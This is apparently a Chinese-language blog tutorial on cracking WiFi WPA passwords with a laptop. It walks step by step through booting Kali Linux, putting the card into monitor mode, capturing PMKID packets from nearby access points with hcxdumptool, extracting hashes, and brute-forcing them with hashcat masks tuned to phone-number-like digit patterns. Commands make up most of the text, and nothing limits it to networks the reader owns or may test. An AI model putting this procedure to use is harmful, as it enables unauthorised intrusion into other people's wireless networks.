破解 WIFA WPA 密碼
我使用的硬體是 ASUS VivoBook S13 筆電,配備 GeForce MX150 顯卡( 1600/2048 MB, 512 MB allocatable, 3MCU)。惟 Windows 無法運用 hcxdumptool 擷取封包,及執行 hcxpcaptool 萃取 PMKID 封包,先用隨身碟執行 Kali Linux 系統萃取 PMKID 封包。再因 Kali Linux 之 hashcat 無法使用顯卡再轉至 Windows 執行 hashcat 使用顯卡運算。
WPA 個人模式,係使用預共享金鑰模式(pre-shared key (PSK)),使用者必須輸入預先設定的金鑰接入網路,金鑰係8至63個ASCII字元或是64個16進位數字(256位元)。
步驟如次:
- 建立Kali Linux開機隨身碟:下載 Kali Linux ISO 檔並運用?建立開機隨身碟。
- 設定筆電以隨身碟開機:
- 筆電(ASUS VivoBook S13)重開機顯示ASUS 商標畫面時。
- 按下F2進入BIOS畫面。
- 按 F8 進入Security 分頁,將選項 Secure Boot Control 設為 Disabled。
- 進入 Boot 分頁,將選項 Fast Boot 設為 Disabled。
- 按 F10 儲存設定並重開機。
- 於顯示ASUS 商標畫面時,按 F2 進入 BIOS 畫面。
- Boot Menu設定 Boot Order 設為隨身碟。
- 啟動 Kali Linux:
- 隨身碟插入筆電,筆電重開機,啟動 Kali Linux。
- 啟動 Setting 程式設定螢幕字型。
- 右鍵點工具列電池圖示,開啟電源管理選項,關閉螢幕保護及休眠選項。
- 連接網際網路:右鍵點工具列網路圖示,開啟網路,設定 WIFI 網路的SSID 及 WPA-PERSONAL 密碼,連結網際網路。
- 更新套件資料庫:開啟 Terminal,輸入指令 sudo apt update,更新作業系統套件資料庫。
- 安裝破解工具:
- 進入Terminal,輸入指令 sudo apt install hcxdumptool,安裝 hcxdumptool。
- 輸入指令 sudo apt install hcxtools,安裝 hcxtools。
- 關閉網際網路:右鍵點工具列網路圖示,按 disconnect 關閉網際網路,空出網卡用來擷取封包。
- 擷取封包:
- 進入Terminal,輸入指令 sudo airmon-ng start wlan0,啟動 wlan0 介面進入 monitor 模式,介面名稱預設為 wlan0mon。
- 輸入指令 sudo hcxdumptool -o pmkid.pcapng -i wlan0mon --enable_status=1,下載封包至 pmkid.pcapng 檔案。
- 畫面出現 FOUND PMKID ,表示擷取到 PMKID封包。
- 萃取PMKID封包:進入Terminal,輸入指令 hcxpcaptool -z pmkid.16800 pmkid.pcapng,萃取 pmkid.pcapng 檔內的 PMKID 記錄,並以 PMKID*MAC AP*MAC STATION*ESSID 格式存到 pmkid.16800 檔案。
- 上傳至信箱:
- 進入Terminal,輸入指令 sudo airmon-ng stop wlan0mon,關閉無線網路監視模式。
- 重覆步驟 4 連接網際網路,開啟信箱,將 PMKID 封包檔,pmkid.16800 寄給自已。
- 啟動 Windows 10 系統:
- 筆電重開機顯示ASUS 商標畫面時,按下F2進入BIOS畫面。
- 按 F8 進入Security 分頁,將選項 Secure Boot Control 設為 Enabled。
- 進入 Boot 分頁,將選項 Fast Boot 設為 Enabled。
- 按 F10 儲存設定並重開機,啟動 Windows 10 系統。
- 破解密碼:
- 下載 hashcat binaries,解壓至目錄 c:\hashcat。
- 開啟命令提示字元,輸入指令 cd c:\hashcat,設定工作目錄。
- 開啟個人信箱下載 PMKID 封包檔 pmkid.16800 至 c:\hashcat。
- hashcat -m 16800 pmkid.16800 -a 3 07?d?d?d?d?d?d?d
- hashcat -m 16800 pmkid.16800 -a 3 09?d?d?d?d?d?d?d?d
- hashcat -m 16800 pmkid.16800 -a 3 ?a?a?a?a?a?a?a?a
- ?a 表示ASCII大小寫英文及符號字元
- 要使用筆電時,按下 c 執行 checkpoint 儲存已測試過的密碼;使用完後,輸入指令 hashcat --session hashcat --restore 重新啟動破解程序。
留言